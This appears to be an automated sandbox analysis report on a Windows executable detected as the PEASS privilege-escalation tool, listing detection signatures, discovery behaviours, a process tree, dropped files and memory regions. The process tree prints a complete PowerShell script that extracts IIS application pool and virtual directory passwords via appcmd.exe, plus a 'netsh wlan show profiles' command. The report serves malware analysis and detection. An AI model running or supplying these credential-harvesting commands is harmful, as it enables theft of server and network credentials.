Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows11-21h2_x64
  • resource
    win11-20260513-en
  • resource tags

    arch:x64arch:x86image:win11-20260513-enlocale:en-usos:windows11-21h2-x64systemwindows
  • submitted
    20/05/2026, 10:35

General

  • Target
    2026-05-20_ead3edbc32add8873f4d08432432a836_darkgate_elex_glassworm_hijackloader_icedid_quasar-rat_silence.exe
  • Size 10.5MB
  • Sample260520-mmsnlsbs91
  • SHA256 012e9b42a6f5e6907bd0c3602d421ff9515efbe7fa816c1a96a80f18410fd66b
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Family: PEASS, PEASS-ng, Peas

    PEASS is an open-source tool for privilege escalation.

  • Detects PEASS hacktool 1 IoCs
  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • Detects executables packed with Dotfuscator 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, crypt 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-05-20_ead3edbc32add8873f4d08432432a836_darkgate_elex_glassworm_hijackloader_icedid_quasar-rat_silence.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-05-20_ead3edbc32add8873f4d08432432a836_darkgate_elex_glassworm_hijackloader_icedid_quasar-rat_silence.exe"
    1⤵
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Event Triggered Execution: Netsh Helper DLL
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\SysWOW64\systeminfo.exe
      "systeminfo.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Gathers system information
      PID:5404
    • C:\Windows\SysWOW64\netsh.exe
      "netsh" wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:5188
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" # Check if appcmd.exe exists if (Test-Path ('C:\Windows\system32\inetsrv\appcmd.exe')) { # Create data table to house results $DataTable = New-Object System.Data.DataTable # Create and name columns in the data table $Null = $DataTable.Columns.Add('user') $Null = $DataTable.Columns.Add('pass') $Null = $DataTable.Columns.Add('type') $Null = $DataTable.Columns.Add('vdir') $Null = $DataTable.Columns.Add('apppool') # Get list of application pools Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list apppools /text:name' | ForEach-Object { # Get application pool name $PoolName = $_ # Get username $PoolUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.username' $PoolUser = Invoke-Expression $PoolUserCmd # Get password $PoolPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.password' $PoolPassword = Invoke-Expression $PoolPasswordCmd # Check if credentials exists if (($PoolPassword -ne '') -and ($PoolPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName) } } # Get list of virtual directories Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list vdir /text:vdir.name' | ForEach-Object { # Get Virtual Directory Name $VdirName = $_ # Get username $VdirUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:userName' $VdirUser = Invoke-Expression $VdirUserCmd # Get password $VdirPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:password' $VdirPassword = Invoke-Expression $VdirPasswordCmd # Check if credentials exists if (($VdirPassword -ne '') -and ($VdirPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA') } } # Check if any passwords were found if( $DataTable.rows.Count -gt 0 ) { # Display results in list view that can feed into the pipeline #$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique $DataTable | Select-Object user,pass,type,vdir,apppool } else { # Status user Write-host 'No application pool or virtual directory passwords were found.' } }
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:3212
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004B8 0x00000000000004C8
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4488

Network

        MITRE ATT&CK Enterprise v16

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        sqlite.interop.dll

        • Path C:\Users\Admin\AppData\Local\Temp\Costura\27562734BD0EFF9434A8AA8BED4CA874\32\sqlite.interop.dll
        • Size 1.6MB
        • SHA256 8b6f38f1458fa0b3bfdde677f8806a1752b257c1cd7a07576f6b72a753a9b45c
        • MD5 SHA1 SHA512 SSDEEP TLSH

        __PSScriptPolicyTest_1dscofke.zew.ps1

        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1dscofke.zew.ps1
        • Size 60B
        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
        • MD5 SHA1 SHA512 TLSH

        memory/2328-77-0x000000000DD90000-0x000000000DE44000-memory.dmp

        memory/2328-78-0x000000000DE50000-0x000000000DE5A000-memory.dmp

        memory/2328-79-0x000000000DE80000-0x000000000DEA6000-memory.dmp

        memory/2328-9-0x00000000068E0000-0x0000000006946000-memory.dmp

        memory/2328-10-0x00000000067F0000-0x0000000006808000-memory.dmp

        memory/2328-11-0x0000000006050000-0x0000000006060000-memory.dmp

        memory/2328-12-0x000000000AA70000-0x000000000B016000-memory.dmp

        memory/2328-13-0x000000000A5A0000-0x000000000A632000-memory.dmp

        memory/2328-14-0x000000000B020000-0x000000000B1E2000-memory.dmp

        memory/2328-15-0x000000000B720000-0x000000000BC4C000-memory.dmp

        memory/2328-20-0x0000000006050000-0x0000000006060000-memory.dmp

        memory/2328-21-0x0000000040000000-0x00000000400F6000-memory.dmp

        memory/2328-26-0x0000000006050000-0x0000000006060000-memory.dmp

        memory/2328-27-0x000000000CE00000-0x000000000CE22000-memory.dmp

        memory/2328-28-0x0000000040000000-0x000000004025B000-memory.dmp

        memory/2328-36-0x0000000040000000-0x0000000040047000-memory.dmp

        memory/2328-49-0x0000000040000000-0x0000000040A99000-memory.dmp

        memory/2328-60-0x0000000040000000-0x00000000404C4000-memory.dmp

        memory/2328-66-0x0000000040000000-0x0000000040007000-memory.dmp

        memory/2328-76-0x000000000CD60000-0x000000000CD67000-memory.dmp

        memory/2328-7-0x0000000006050000-0x0000000006060000-memory.dmp

        memory/2328-0-0x0000000000B90000-0x000000000160A000-memory.dmp

        memory/2328-8-0x0000000006820000-0x000000000686A000-memory.dmp

        memory/2328-80-0x000000000DED0000-0x000000000DED8000-memory.dmp

        memory/2328-81-0x000000000DEE0000-0x000000000DEF8000-memory.dmp

        memory/2328-82-0x000000000DEC0000-0x000000000DECA000-memory.dmp

        memory/2328-83-0x000000000DF00000-0x000000000DF08000-memory.dmp

        memory/2328-84-0x000000000DF30000-0x000000000DF3A000-memory.dmp

        memory/2328-85-0x000000000DF90000-0x000000000DFA8000-memory.dmp

        memory/2328-90-0x000000000CD60000-0x000000000CD67000-memory.dmp

        memory/2328-96-0x0000000009AD0000-0x0000000009B20000-memory.dmp

        memory/2328-97-0x0000000006F90000-0x0000000006FAE000-memory.dmp

        memory/2328-114-0x000000000E100000-0x000000000E457000-memory.dmp

        memory/2328-6-0x00000000064A0000-0x0000000006506000-memory.dmp

        memory/3212-100-0x0000000005770000-0x0000000005792000-memory.dmp

        memory/3212-99-0x00000000058E0000-0x0000000005F0A000-memory.dmp

        memory/3212-107-0x0000000006040000-0x0000000006397000-memory.dmp

        memory/3212-108-0x0000000006520000-0x000000000653E000-memory.dmp

        memory/3212-109-0x0000000006A60000-0x0000000006AAC000-memory.dmp

        memory/3212-110-0x00000000077E0000-0x0000000007876000-memory.dmp

        memory/3212-111-0x00000000069E0000-0x00000000069FA000-memory.dmp

        memory/3212-98-0x0000000002D20000-0x0000000002D56000-memory.dmp